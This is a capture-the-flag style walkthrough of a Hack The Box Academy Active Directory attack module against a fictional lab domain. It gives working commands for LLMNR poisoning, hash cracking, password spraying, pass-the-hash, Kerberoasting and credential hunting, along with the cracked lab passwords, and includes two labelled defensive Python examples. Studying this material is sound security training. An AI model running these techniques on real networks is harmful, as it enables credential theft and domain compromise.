# Active Directory Enumeration & Attacks

## External Recon and Enumeration Principles

Q1) While looking at inlanefreight's public records, a flag can be seen. Find the flag and submit it. ( format == HTB{\*\*\*\*\*\*} )

```bash
nslookup -type=TXT inlanefreight.com
```

<figure><img src="/files/IMklm2bXz5bygJcwwsFt" alt=""><figcaption></figcaption></figure>

Answer:  HTB{5Fz6UPNUFFzqjdg0AzXyxCjMZ}

## Initial Enumeration of the Domain

#### Identifying Hosts

Let's begin by monitoring the network to gain insight into current activity. Using tools like `Wireshark` and `TCPDump`, we can analyze the traffic and identify active hosts and the types of communications occurring across the network.

```bash
sudo -E wireshark                              # Using Wireshark
sudo tcpdump -i ens224                         # Using Tcpdump
```

<figure><img src="/files/EzUVaJ0wQvBejHNtZvGk" alt=""><figcaption></figcaption></figure>

**Starting Responder**

Responder is a tool built to listen, analyze, and poison `LLMNR`, `NBT-NS`, and `MDNS` requests and responses.

```bash
sudo responder -I ens224 -A 
```

<figure><img src="/files/JD7EVArFleqTzmCAgCJU" alt=""><figcaption></figcaption></figure>
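Responder works because LLMNR and mDNS are DNS-shaped, unauthenticated name lookups, so any host on the segment can answer them. The following is an added example (not part of this write-up and not Responder's own code) that decodes LLMNR query and response packets and applies the usual defensive check: query a canary name that no real host owns, and treat any host that answers it as a poisoner. The packet bytes, the `canary-host` name and the 10.0.0.x addresses are constructed for the example.

```python
"""Decode LLMNR (RFC 4795, DNS wire format over UDP/5355) and flag hosts that
answer a canary name nobody legitimately owns. Added example; packets and
addresses below are constructed, not captured traffic."""
import struct


def _read_name(buf, offset):
    """Read a DNS label sequence at offset; returns (name, next_offset).
    Handles the 0xC0xx compression pointer used in answer sections."""
    labels = []
    while True:
        length = buf[offset]
        if length & 0xC0 == 0xC0:                       # compression pointer
            pointer = struct.unpack("!H", buf[offset:offset + 2])[0] & 0x3FFF
            name, _ = _read_name(buf, pointer)
            labels.append(name)
            return ".".join(labels), offset + 2
        offset += 1
        if length == 0:
            return ".".join(labels), offset
        labels.append(buf[offset:offset + length].decode("ascii"))
        offset += length


def parse_llmnr(buf):
    """Parse header, question and A-record answers of one LLMNR message."""
    txid, flags, _qd, an, _ns, _ar = struct.unpack("!HHHHHH", buf[:12])
    name, off = _read_name(buf, 12)
    qtype, _qclass = struct.unpack("!HH", buf[off:off + 4])
    off += 4
    answers = []
    for _ in range(an):
        _aname, off = _read_name(buf, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", buf[off:off + 10])
        off += 10
        rdata = buf[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rdlen == 4:                    # A record
            answers.append(".".join(str(b) for b in rdata))
    return {"id": txid, "response": bool(flags & 0x8000), "name": name,
            "qtype": qtype, "answers": answers}


def build_query(name, txid=0x1234):
    """Build an LLMNR A query (used here only to construct sample traffic)."""
    qname = b"".join(struct.pack("B", len(l)) + l.encode() for l in name.split(".")) + b"\x00"
    return struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0) + qname + struct.pack("!HH", 1, 1)


def build_response(query, ip):
    """Build the reply a poisoner sends: same question, one A record -> ip."""
    txid, _flags, qd, _an, ns, ar = struct.unpack("!HHHHHH", query[:12])
    rdata = bytes(int(o) for o in ip.split("."))
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 30, 4) + rdata
    return struct.pack("!HHHHHH", txid, 0x8000, qd, 1, ns, ar) + query[12:] + answer


def find_poisoners(packets, canary):
    """Given (src_ip, raw_packet) pairs, return the sources that answered the
    canary name. Nothing owns that name, so every answer is a spoofed one."""
    hits = set()
    for src, raw in packets:
        msg = parse_llmnr(raw)
        if msg["response"] and msg["name"].lower() == canary.lower() and msg["answers"]:
            hits.add(src)
    return hits


# Constructed capture: one canary query, a poisoned answer from .99, and an
# unrelated lookup that nobody answers.
CANARY = "canary-host"
_q = build_query(CANARY)
CAPTURE = [
    ("10.0.0.20", _q),
    ("10.0.0.99", build_response(_q, "10.0.0.99")),
    ("10.0.0.20", build_query("fileserver01")),
]

if __name__ == "__main__":
    print("poisoners:", find_poisoners(CAPTURE, CANARY))
```

In production the canary query is sent periodically from a monitoring host and the packets come from a capture on UDP/5355 (and UDP/137 for NBT-NS, which uses the same idea); the real fix remains disabling LLMNR and NBT-NS via Group Policy, with this check acting as the detection that tells you when someone is poisoning anyway.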

**FPing Active Checks**

```bash
fping -asgq 172.16.5.0/23
```

<figure><img src="/files/8u7erctYLRtm7YbmEIdQ" alt=""><figcaption></figcaption></figure>

#### Kerbrute - Internal AD Username Enumeration

```bash
kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jjsmith.txt -o valid_ad_users
```

<figure><img src="/files/yyzzSuws2yst3SGTyWC8" alt=""><figcaption></figcaption></figure>

Q1) From your scans, what is the "commonName" of host 172.16.5.5?

```bash
sudo nmap -v -A -iL hosts.txt -oN /home/htb-student/Documents/host-enum
```

<figure><img src="/files/94kRfoWUyJZ3b4Z32oDI" alt=""><figcaption></figcaption></figure>

Answer:  ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL

Q2) What host is running "Microsoft SQL Server 2019 15.00.2000.00"? (IP address, not Resolved name)

```bash
sudo nmap -v -A -iL hosts.txt -oN /home/htb-student/Documents/host-enum
```

<figure><img src="/files/UApoeNhgXtbNawJ1bn7A" alt=""><figcaption></figcaption></figure>

Answer:  172.16.5.130

## LLMNR/NBT-NS Poisoning - from Linux

Q1) Run Responder and obtain a hash for a user account that starts with the letter b. Submit the account name as your answer.

```bash
sudo responder -I ens224 
```

<figure><img src="/files/Qj6Q3KAp4kJXmeS1TSSH" alt=""><figcaption></figcaption></figure>

Answer:  backupagent

Q2) Crack the hash for the previous account and submit the cleartext password as your answer.

```bash
sudo hashcat -m 5600 backupagent_NTLMv2 /usr/share/wordlists/rockyou.txt
```

<figure><img src="/files/OG2MRmztLgj3nkAeh7V3" alt=""><figcaption></figcaption></figure>

Answer:  h1backup55

Q3) Run Responder and obtain an NTLMv2 hash for the user wley. Crack the hash using Hashcat and submit the user's password as your answer.

<figure><img src="/files/7T6ICrD7murQacZQH8hr" alt=""><figcaption></figcaption></figure>

```bash
sudo hashcat -m 5600 wley_NTLMv2 /usr/share/wordlists/rockyou.txt
```

<figure><img src="/files/GdWtd9rQhmut0MkNprm4" alt=""><figcaption></figcaption></figure>

Answer:  transporter\@4

## LLMNR/NBT-NS Poisoning - from Windows

#### Using Inveigh

```powershell
Import-Module .\Inveigh.ps1
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
```

<figure><img src="/files/QZccFXXbNaclpAwTkMeQ" alt=""><figcaption></figcaption></figure>

#### C# Inveigh (InveighZero)

```powershell
.\Inveigh.exe
```

<figure><img src="/files/CP1sLzufYIRbhQ11fxql" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/LqvvuCCfNFrPckQmYp1p" alt=""><figcaption></figcaption></figure>

Q1) Run Inveigh and capture the NTLMv2 hash for the svc\_qualys account. Crack and submit the cleartext password as the answer.

```powershell
.\Inveigh.exe
GET NTLMV2UNIQUE
```

<figure><img src="/files/7DnRpZKnDhQDSrqjceHA" alt=""><figcaption></figcaption></figure>

```bash
sudo hashcat -m 5600 svc_qualys /usr/share/wordlists/rockyou.txt
```

<figure><img src="/files/FCtVhtbGSxz9wivk4DL4" alt=""><figcaption></figcaption></figure>

Answer: security#1

## Enumerating & Retrieving Password Policies

#### Enumerating the Password Policy - from Linux - Credentialed

```bash
crackmapexec smb 172.16.5.5 -u avazquez -p Password123 --pass-pol
```

<figure><img src="/files/4q7zzqKnQD09BLrjJl56" alt=""><figcaption></figcaption></figure>

#### SMB NULL Sessions

```bash
rpcclient -U "" -N 172.16.5.5
getdompwinfo
```

<figure><img src="/files/Y4wpAxfgOCtB90QCPqsb" alt=""><figcaption></figcaption></figure>

**Using enum4linux**

```bash
enum4linux -P 172.16.5.5
```

<figure><img src="/files/vGWJJlTNeFT1J5b7wvMW" alt=""><figcaption></figcaption></figure>

**Using enum4linux-ng**

```bash
enum4linux-ng -P 172.16.5.5 -oA ilfreight
```

<figure><img src="/files/av8wVvfY0FByNeNKcCqX" alt=""><figcaption></figcaption></figure>

#### Enumerating the Password Policy - from Linux - LDAP Anonymous Bind

```bash
ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength
```

<figure><img src="/files/d0o5RAtgXZIRe2SwbvI9" alt=""><figcaption></figcaption></figure>

#### Enumerating the Password Policy - from Windows

```powershell
net use \\DC01\ipc$ "" /u:""
net accounts
Get-DomainPolicy                     # From PowerView
```

Q1) What is the default Minimum password length when a new domain is created? (One number)

Answer:  7

Q2) What is the minPwdLength set to in the INLANEFREIGHT.LOCAL domain? (One number)

```bash
crackmapexec smb 172.16.5.5 -u avazquez -p Password123 --pass-pol
```

<figure><img src="/files/Px2THpB5xEfVSU3R6aP3" alt=""><figcaption></figcaption></figure>

Answer:  8

### Password Spraying - Making a Target User List

#### SMB NULL Session to Pull User List

```bash
enum4linux -U 172.16.5.5  | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"
```

<figure><img src="/files/YUAt3y9mPIZBeMwGsw1d" alt=""><figcaption></figcaption></figure>

**Using rpcclient**

```bash
rpcclient -U "" -N 172.16.5.5
```

<figure><img src="/files/MYs3arrZQaAuNzgENrlG" alt=""><figcaption></figcaption></figure>

**Using CrackMapExec --users Flag**

```bash
crackmapexec smb 172.16.5.5 --users
```

<figure><img src="/files/t3EGeU4sR5LGlxhVH75o" alt=""><figcaption></figcaption></figure>

#### Gathering Users with LDAP Anonymous

```bash
ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))"  | grep sAMAccountName: | cut -f2 -d" "
```

<figure><img src="/files/qsd9bT2RXBqxsZ7uZZOO" alt=""><figcaption></figcaption></figure>

```bash
./windapsearch.py --dc-ip 172.16.5.5 -u "" -U
```

<figure><img src="/files/F2d2z9EpFzsXwBEZ2y9F" alt=""><figcaption></figcaption></figure>

Q1) Enumerate valid usernames using Kerbrute and the wordlist located at /opt/jsmith.txt on the ATTACK01 host. How many valid usernames can we enumerate with just this wordlist from an unauthenticated standpoint?

```bash
kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt 
```

<figure><img src="/files/tM5GsccqViab5muVlIfc" alt=""><figcaption></figcaption></figure>

Answer:  56

## Internal Password Spraying - from Linux

#### **Using a Bash one-liner for the Attack**

```bash
for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done
```

<figure><img src="/files/OIBGyy65AT2qbsYIOLC5" alt=""><figcaption></figcaption></figure>

#### **Using Kerbrute for the Attack**

```bash
kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt  Welcome1
```

<figure><img src="/files/wwZOfcyy5yib1UXXRbWx" alt=""><figcaption></figcaption></figure>

**Using CrackMapExec & Filtering Logon Failures**

```bash
sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +
```

<figure><img src="/files/xbci0WnQkN1DUWTBMloQ" alt=""><figcaption></figcaption></figure>

#### **Validating the Credentials with CrackMapExec**

```bash
sudo crackmapexec smb 172.16.5.5 -u avazquez -p Password123
```

<figure><img src="/files/Dyk0Zqd5MjYWF4fWFGlD" alt=""><figcaption></figcaption></figure>

#### **Local Admin Spraying with CrackMapExec**

```bash
sudo crackmapexec smb --local-auth 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +
```

The `--local-auth` flag tells the tool to attempt the login only once on each machine, which removes any risk of account lockout. Make sure this flag is set so we don't potentially lock out the built-in administrator account for the domain.

Q1) Find the user account starting with the letter "s" that has the password Welcome1. Submit the username as your answer.

```bash
for u in $(cat valid_usernames.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done
sudo crackmapexec smb 172.16.5.5 -u sgage -p Welcome1
```

<figure><img src="/files/hv2vEkyTRtXxXSrJ3sNK" alt=""><figcaption></figcaption></figure>

Answer:  sgage

## Internal Password Spraying - from Windows

Q1) Using the examples shown in this section, find a user with the password Winter2022. Submit the username as the answer.

```powershell
Invoke-DomainPasswordSpray -Password Winter2022 -OutFile spray_success -ErrorAction SilentlyContinue
```

<figure><img src="/files/Tp0hLTJNCA0h4xzRi6vJ" alt=""><figcaption></figcaption></figure>

Answer:  dbranch

## Enumerating Security Controls

#### **Checking the Status of Defender with Get-MpComputerStatus**

```powershell
Get-MpComputerStatus
```

<figure><img src="/files/2nxQjJcGmSyI1EbPHoiO" alt=""><figcaption></figcaption></figure>

#### **Using Get-AppLockerPolicy cmdlet**

```powershell
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
```

#### **Enumerating Language Mode**

```powershell
$ExecutionContext.SessionState.LanguageMode
```

<figure><img src="/files/Q8JQ35H4MoHzeVoCfW6p" alt=""><figcaption></figcaption></figure>

### LAPS

The Microsoft [Local Administrator Password Solution (LAPS)](https://www.microsoft.com/en-us/download/details.aspx?id=46899) is used to randomize and rotate local administrator passwords on Windows hosts and prevent lateral movement.

#### **Enumerating LAPS**

```powershell
Find-LAPSDelegatedGroups
Find-AdmPwdExtendedRights
Get-LAPSComputers
```

## Credentialed Enumeration - from Linux

#### **CME - Domain User Enumeration**

```bash
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --users
```

<figure><img src="/files/wKyAicGN9RRXZu6fB31v" alt=""><figcaption></figcaption></figure>

#### **CME - Domain Group Enumeration**

```bash
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --groups
```

<figure><img src="/files/XmbxWwpQCkdTitDJDQpG" alt=""><figcaption></figcaption></figure>

#### **CME - Logged On Users**

```bash
sudo crackmapexec smb 172.16.5.130 -u forend -p Klmcargo2 --loggedon-users
```

<figure><img src="/files/LWsE2fRbn8ZOJhiDQhdP" alt=""><figcaption></figcaption></figure>

#### **CME Share Searching**

```bash
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --shares
```

<figure><img src="/files/nEekzhy5mEHLxeTGZKNF" alt=""><figcaption></figcaption></figure>

#### **Spider\_plus**

```bash
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M spider_plus --share 'Department Shares'
```

<figure><img src="/files/rinJnrC7UDZ3AlrIJ2Xq" alt=""><figcaption></figcaption></figure>

#### **SMBMap To Check Access**

```bash
smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5
```

<figure><img src="/files/K1LpX7jKCtGTYbX84EeR" alt=""><figcaption></figcaption></figure>

#### **Recursive List Of All Directories**

```bash
smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5 -R 'Department Shares' --dir-only
```

<figure><img src="/files/VkJGKEajmGvVXTaLP2ex" alt=""><figcaption></figcaption></figure>

#### **SMB NULL Session with rpcclient**

```bash
rpcclient -U "" -N 172.16.5.5
```

#### **RPCClient User Enumeration By RID**

```bash
queryuser 0x457
```

<figure><img src="/files/G2kPLvlhRdNGinVwGH7v" alt=""><figcaption></figcaption></figure>

#### **Enumdomusers**

```bash
enumdomusers
```

<figure><img src="/files/YtChQpcuCe3bayemlXpv" alt=""><figcaption></figcaption></figure>

### Impacket Toolkit

```bash
psexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.125  
wmiexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.5  
python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 --da   # Windapsearch - Domain Admins
python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 -PU    # Windapsearch - Privileged Users
```

### Bloodhound.py

```bash
sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all 
```

Q1) What AD User has a RID equal to Decimal 1170?

Let's begin by converting this number from decimal to hexadecimal.

<figure><img src="/files/vMw34No3t9jidldKhILZ" alt=""><figcaption></figcaption></figure>

```bash
queryuser 0x492
```

<figure><img src="/files/1plGHOjJwdWMIHXXsXxb" alt=""><figcaption></figcaption></figure>

Answer:  mmorgan
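`queryuser` takes the RID in hex, while BloodHound, PowerView and the SID itself carry it in decimal as the last sub-authority. The following is an added example (not from this write-up or from rpcclient) that splits a SID into its domain part and RID, converts in both directions, and also maps the well-known RIDs every domain carries (500 Administrator, 502 krbtgt, 512 Domain Admins, 519 Enterprise Admins and so on); that last part goes beyond the question, which only needed the decimal-to-hex step. The SID used is the child-domain SID from the Domain Trusts section of this write-up with the RID from this question appended.

```python
"""SID parsing and RID conversion helpers. Added example, not rpcclient's own
code; the sample SID combines values that appear elsewhere in this write-up."""
import re

SID_RE = re.compile(r"^S-(\d+)-(\d+)((?:-\d+)+)$")

# Well-known domain RIDs (values documented by Microsoft for every AD domain).
WELL_KNOWN_RIDS = {
    500: "Administrator", 501: "Guest", 502: "krbtgt",
    512: "Domain Admins", 513: "Domain Users", 514: "Domain Guests",
    515: "Domain Computers", 516: "Domain Controllers", 517: "Cert Publishers",
    518: "Schema Admins", 519: "Enterprise Admins", 520: "Group Policy Creator Owners",
    525: "Protected Users", 526: "Key Admins", 527: "Enterprise Key Admins",
}


def parse_sid(sid):
    """Split 'S-R-A-s1-s2-...-RID' into revision, authority, domain SID and RID."""
    m = SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a SID: {sid}")
    revision, authority, rest = m.groups()
    subs = [int(x) for x in rest.strip("-").split("-")]
    rid = subs[-1]
    domain_sid = f"S-{revision}-{authority}-" + "-".join(str(s) for s in subs[:-1])
    return {
        "revision": int(revision),
        "identifier_authority": int(authority),
        "domain_sid": domain_sid,
        "rid": rid,
        "rid_hex": f"0x{rid:x}",            # the form rpcclient's queryuser wants
        "well_known": WELL_KNOWN_RIDS.get(rid),
    }


def rid_from_hex(text):
    """Reverse direction: '0x492' (as shown in rpcclient output) -> 1170."""
    return int(text, 16)


if __name__ == "__main__":
    # Constructed: child-domain SID from this write-up + the RID from the question.
    info = parse_sid("S-1-5-21-2806153819-209893948-922872689-1170")
    print(f"rpcclient> queryuser {info['rid_hex']}")          # 0x492
    print(parse_sid(info["domain_sid"] + "-519")["well_known"])  # Enterprise Admins
```

Because the domain part of the SID is constant and only the RID varies, `queryuser` can walk RIDs directly; a defender reviewing rpcclient output can use `rid_from_hex` to turn the hex RIDs back into the decimal values BloodHound and the event log report.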

Q2) What is the membercount: of the "Interns" group?

```bash
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --groups | grep -i "interns"
```

<figure><img src="/files/3DcxymOZJ85c95I42iW0" alt=""><figcaption></figcaption></figure>

## Credentialed Enumeration - from Windows

#### Get Domain Info

```powershell
Import-Module ActiveDirectory
Get-ADDomain
```

<figure><img src="/files/ge0uG5ZHpABi488d7Yub" alt=""><figcaption></figcaption></figure>

```powershell
Get-ADUser
```

<figure><img src="/files/NxkZmXPjWq0Rbe5ed4Jh" alt=""><figcaption></figcaption></figure>

#### **Checking For Trust Relationships**

```powershell
Get-ADTrust -Filter *
```

<figure><img src="/files/UDHblstS7wRhMF0YISOU" alt=""><figcaption></figcaption></figure>

#### **Group Enumeration**

```powershell
Get-ADGroup -Filter * | select name
```

<figure><img src="/files/0RGNcIspbaAutKPiD2gz" alt=""><figcaption></figcaption></figure>

#### **Detailed Group Info**

```powershell
Get-ADGroup -Identity "Backup Operators"
```

<figure><img src="/files/DtYEd6H8wN4fB3zy9Pj6" alt=""><figcaption></figcaption></figure>

### PowerView

| **Command**                         | **Description**                                                                            |
| ----------------------------------- | ------------------------------------------------------------------------------------------ |
| `Export-PowerViewCSV`               | Append results to a CSV file                                                               |
| `ConvertTo-SID`                     | Convert a User or group name to its SID value                                              |
| `Get-DomainSPNTicket`               | Requests the Kerberos ticket for a specified Service Principal Name (SPN) account          |
| **Domain/LDAP Functions:**          |                                                                                            |
| `Get-Domain`                        | Will return the AD object for the current (or specified) domain                            |
| `Get-DomainController`              | Return a list of the Domain Controllers for the specified domain                           |
| `Get-DomainUser`                    | Will return all users or specific user objects in AD                                       |
| `Get-DomainComputer`                | Will return all computers or specific computer objects in AD                               |
| `Get-DomainGroup`                   | Will return all groups or specific group objects in AD                                     |
| `Get-DomainOU`                      | Search for all or specific OU objects in AD                                                |
| `Find-InterestingDomainAcl`         | Finds object ACLs in the domain with modification rights set to non-built in objects       |
| `Get-DomainGroupMember`             | Will return the members of a specific domain group                                         |
| `Get-DomainFileServer`              | Returns a list of servers likely functioning as file servers                               |
| `Get-DomainDFSShare`                | Returns a list of all distributed file systems for the current (or specified) domain       |
| **GPO Functions:**                  |                                                                                            |
| `Get-DomainGPO`                     | Will return all GPOs or specific GPO objects in AD                                         |
| `Get-DomainPolicy`                  | Returns the default domain policy or the domain controller policy for the current domain   |
| **Computer Enumeration Functions:** |                                                                                            |
| `Get-NetLocalGroup`                 | Enumerates local groups on the local or a remote machine                                   |
| `Get-NetLocalGroupMember`           | Enumerates members of a specific local group                                               |
| `Get-NetShare`                      | Returns open shares on the local (or a remote) machine                                     |
| `Get-NetSession`                    | Will return session information for the local (or a remote) machine                        |
| `Test-AdminAccess`                  | Tests if the current user has administrative access to the local (or a remote) machine     |
| **Threaded 'Meta'-Functions:**      |                                                                                            |
| `Find-DomainUserLocation`           | Finds machines where specific users are logged in                                          |
| `Find-DomainShare`                  | Finds reachable shares on domain machines                                                  |
| `Find-InterestingDomainShareFile`   | Searches for files matching specific criteria on readable shares in the domain             |
| `Find-LocalAdminAccess`             | Find machines on the local domain where the current user has local administrator access    |
| **Domain Trust Functions:**         |                                                                                            |
| `Get-DomainTrust`                   | Returns domain trusts for the current domain or a specified domain                         |
| `Get-ForestTrust`                   | Returns all forest trusts for the current forest or a specified forest                     |
| `Get-DomainForeignUser`             | Enumerates users who are in groups outside of the user's domain                            |
| `Get-DomainForeignGroupMember`      | Enumerates groups with users outside of the group's domain and returns each foreign member |
| `Get-DomainTrustMapping`            | Will enumerate all trusts for the current domain and any others seen.                      |

#### **Domain User Information**

```powershell
Get-DomainUser -Identity mmorgan -Domain inlanefreight.local | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset,lastlogontimestamp,accountexpires,admincount,userprincipalname,serviceprincipalname,useraccountcontrol
```

<figure><img src="/files/LVk2fBLiKD93jFwkr3JZ" alt=""><figcaption></figcaption></figure>

#### **Recursive Group Membership**

```powershell
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
```

<figure><img src="/files/DkXy8ogxL8hsejPL2LqQ" alt=""><figcaption></figcaption></figure>

#### **Trust Enumeration**

```powershell
Get-DomainTrustMapping
```

<figure><img src="/files/De1TsNUHYuavasFGyXpe" alt=""><figcaption></figcaption></figure>

#### **Testing for Local Admin Access**

```powershell
Test-AdminAccess -ComputerName ACADEMY-EA-MS01
```

<figure><img src="/files/YS3at6Wa4KoUBBcsWYSP" alt=""><figcaption></figcaption></figure>

#### **Finding Users With SPN Set**

```powershell
Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName
```

<figure><img src="/files/oXMVREApwRfrz4w2ynqu" alt=""><figcaption></figcaption></figure>

### SharpView

Here we can use SharpView to enumerate information about a specific user, such as the user `forend`, which we control.

```powershell
.\SharpView.exe Get-DomainUser -Identity forend
```

<figure><img src="/files/w8cP6w4sRunoHZBvyoo4" alt=""><figcaption></figcaption></figure>

### Snaffler

[Snaffler](https://github.com/SnaffCon/Snaffler) is a tool that can help us acquire credentials or other sensitive data in an Active Directory environment. Snaffler works by obtaining a list of hosts within the domain and then enumerating those hosts for shares and readable directories.

```powershell
.\Snaffler.exe  -d INLANEFREIGHT.LOCAL -s -v data
```

<figure><img src="/files/9kRmtfP46yixdjFu8VWL" alt=""><figcaption></figcaption></figure>

Q1) Using Bloodhound, determine how many Kerberoastable accounts exist within the INLANEFREIGHT domain.

```powershell
Import-Module .\PowerView.ps1
Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName
```

<figure><img src="/files/6liuOzfEXPn0YzkOxWTP" alt=""><figcaption></figcaption></figure>

Q2) What PowerView function allows us to test if a user has administrative access to a local or remote host?

```powershell
Test-AdminAccess -ComputerName ACADEMY-EA-MS01
```

<figure><img src="/files/fcdruGtQ5zZHKvjbSZmE" alt=""><figcaption></figcaption></figure>

Answer:  Test-AdminAccess

Q3) Run Snaffler and hunt for a readable web config file. What is the name of the user in the connection string within the file?

```powershell
.\Snaffler.exe  -d INLANEFREIGHT.LOCAL -s -v data
```

<figure><img src="/files/0RXdffqNgyvkHMVAtAu4" alt=""><figcaption></figcaption></figure>

Answer:  sa

Q4) What is the password for the database user?

Answer:  ILFREIGHTDB01!

## Living Off the Land

Q1) Enumerate the host's security configuration information and provide its AMProductVersion.

```powershell
Get-MpComputerStatus
```

<figure><img src="/files/sjWuusphdtxZsuZqPsBv" alt=""><figcaption></figcaption></figure>

Q2) What domain user is explicitly listed as a member of the local Administrators group on the target host?

```powershell
net localgroup administrators
```

<figure><img src="/files/U3tuJz42wBS6RqREvido" alt=""><figcaption></figcaption></figure>

Answer:  adunn

Q3) Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer.

```powershell
dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2))" -attr distinguishedName userAccountControl description
```

<figure><img src="/files/4QrHHwlRmwoOnYX1pGCH" alt=""><figcaption></figcaption></figure>

Answer:  HTB{LD\@P\_I$\_W1ld}

## Kerberoasting - from Linux

Q1) Retrieve the TGS ticket for the SAPService account. Crack the ticket offline and submit the password as your answer.

```bash
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user SAPService
```

<figure><img src="/files/xw5tDH9ourxcFI3BirOA" alt=""><figcaption></figcaption></figure>

```bash
hashcat -m 13100 SAPService /usr/share/wordlists/rockyou.txt
```

<figure><img src="/files/u0XVfjmBhrDUVSzR0E6E" alt=""><figcaption></figcaption></figure>

Answer:  !SapperFi2

Q2) What powerful local group on the Domain Controller is the SAPService user a member of?

```bash
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/SAPService | grep 'SAPService'
```

<figure><img src="/files/dhnsgbaXDV7ziL8h4lX1" alt=""><figcaption></figcaption></figure>

Answer:  Account Operators

## Kerberoasting - from Windows

Q1) What is the name of the service account with the SPN 'vmware/inlanefreight.local'?

```powershell
Get-DomainUser * -spn | select samaccountname
```

<figure><img src="/files/Zp1NKeGLiuh42Wpk1c0E" alt=""><figcaption></figcaption></figure>

Answer:  svc\_vmwaresso

Q2) Crack the password for this account and submit it as your answer.

```powershell
.\Rubeus.exe kerberoast /user:svc_vmwaresso /nowrap
```

<figure><img src="/files/Ko6yLcqORpLiogbOfBIB" alt=""><figcaption></figcaption></figure>

```bash
hashcat -m 13100 svc_vm_tgs /usr/share/wordlists/rockyou.txt
```

<figure><img src="/files/AdsQuZ5l5GbnsUGWcH79" alt=""><figcaption></figcaption></figure>

Answer:  Virtual01

## Access Control List (ACL) Abuse Primer

Q1) What type of ACL defines which security principals are granted or denied access to an object? (one word)

Answer:  DACL

Q2) Which ACE entry can be leveraged to perform a targeted Kerberoasting attack?

Answer:  GenericAll

## ACL Enumeration

Q1) What is the rights GUID for User-Force-Change-Password?

```powershell
$sid = Convert-NameToSid wley
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}
```

<figure><img src="/files/myAbjczcvWXC5RG5zBam" alt=""><figcaption></figcaption></figure>

```powershell
$sid = Convert-NameToSid wley
Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}
```

<figure><img src="/files/peyveIiKFL9KSFA0Qsky" alt=""><figcaption></figcaption></figure>

Or from here: <https://learn.microsoft.com/en-us/windows/win32/adschema/r-user-force-change-password>

<figure><img src="/files/C0GPL0D3SHaSqvEepw72" alt=""><figcaption></figcaption></figure>

Answer:  00299570-246d-11d0-a768-00aa006e0529

Q2) What flag can we use with PowerView to show us the ObjectAceType in a human-readable format during our enumeration?

Answer:  ResolveGUIDs

Q3) What privileges does the user damundsen have over the Help Desk Level 1 group?

```powershell
$sid2 = Convert-NameToSid damundsen
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid2} -Verbose
```

<figure><img src="/files/sW0VttNWutBDZFWSxsfS" alt=""><figcaption></figcaption></figure>

Answer:  GenericWrite

Q4) Using the skills learned in this section, enumerate the ActiveDirectoryRights that the user forend has over the user dpayne (Dagmar Payne).

```powershell
$sid2 = Convert-NameToSid forend
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid2}
```

<figure><img src="/files/sPi7nT6OaaH5bXiNyoOA" alt=""><figcaption></figcaption></figure>

Answer: GenericAll

Q5) What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)

```powershell
.\SharpHound.exe -c All --zipfilename ILFREIGHT
```

<figure><img src="/files/nutcZsWBDzPPrGDtRwAV" alt=""><figcaption></figcaption></figure>

Next, let's upload this ZIP file to the BloodHound GUI for analysis.

I selected **FOREND@INLANEFREIGHT.LOCAL** as the starting node. Then, from the **Node Info** tab, I scrolled down to the **`Outbound Control Rights`** section, followed by **`First Degree Object Control`**.

<figure><img src="/files/J6Su9DwbJbWlBMZoxjn7" alt=""><figcaption></figcaption></figure>

Answer:  Self-Membership

## ACL Abuse Tactics

